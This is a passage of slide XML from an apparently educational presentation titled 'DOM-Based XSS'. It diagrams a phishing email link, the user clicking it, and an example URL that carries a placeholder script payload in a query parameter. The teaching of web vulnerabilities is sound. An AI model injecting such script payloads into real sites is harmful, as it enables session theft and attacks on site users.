            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fashion,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ignores</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="850032"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643544" y="333396"/>
            <a:ext cx="4902200" cy="920830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DOM-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-127" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="1998980" cy="2860887"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="1499235" cy="2145665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1468108" y="1887098"/>
              <a:ext cx="1109980" cy="1320165"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1109980" h="1320164">
                  <a:moveTo>
                    <a:pt x="1109726" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1319745"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38099">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1468099" y="3076445"/>
              <a:ext cx="125095" cy="130810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="125094" h="130810">
                  <a:moveTo>
                    <a:pt x="22529" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="130390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124599" y="85813"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3009053" y="3877902"/>
            <a:ext cx="7378700" cy="1546013"/>
            <a:chOff x="2256789" y="2908426"/>
            <a:chExt cx="5534025" cy="1159510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2275839" y="3509035"/>
              <a:ext cx="4620895" cy="6350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4620895" h="6350">
                  <a:moveTo>
                    <a:pt x="0" y="6324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4620641" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6782084" y="3442525"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="190" y="133350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114401" y="66509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293242" y="3966512"/>
              <a:ext cx="4554220" cy="16510"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4554220" h="16510">
                  <a:moveTo>
                    <a:pt x="4554016" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="16078"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293240" y="3915501"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114935" h="133350">
                  <a:moveTo>
                    <a:pt x="114058" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="67081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114541" y="133350"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="5058833" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="2086981" indent="318339">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1. Send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Email </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13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com/welcome.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631616" y="5233605"/>
            <a:ext cx="390313" cy="242866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>er</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4388545"/>
            <a:ext cx="2479885" cy="1144692"/>
            <a:chOff x="275348" y="3291408"/>
            <a:chExt cx="1859914" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3301834"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929982" y="3296170"/>
              <a:ext cx="1167130" cy="795655"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1167130" h="795654">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1166888" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1166888" y="795362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="795362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3418331"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>
              <a:ext cx="1143000" cy="636270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1143000" h="636270">
                  <a:moveTo>
                    <a:pt x="1142987" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="636168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142987" y="636168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142987" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>
              <a:ext cx="1143000" cy="636270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1143000" h="636270">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1142987" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142987" y="636168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="636168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3583284" y="4117959"/>
            <a:ext cx="4708313"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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Click</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792583" y="5842213"/>
            <a:ext cx="6550660" cy="755762"/>
          </a:xfrm>
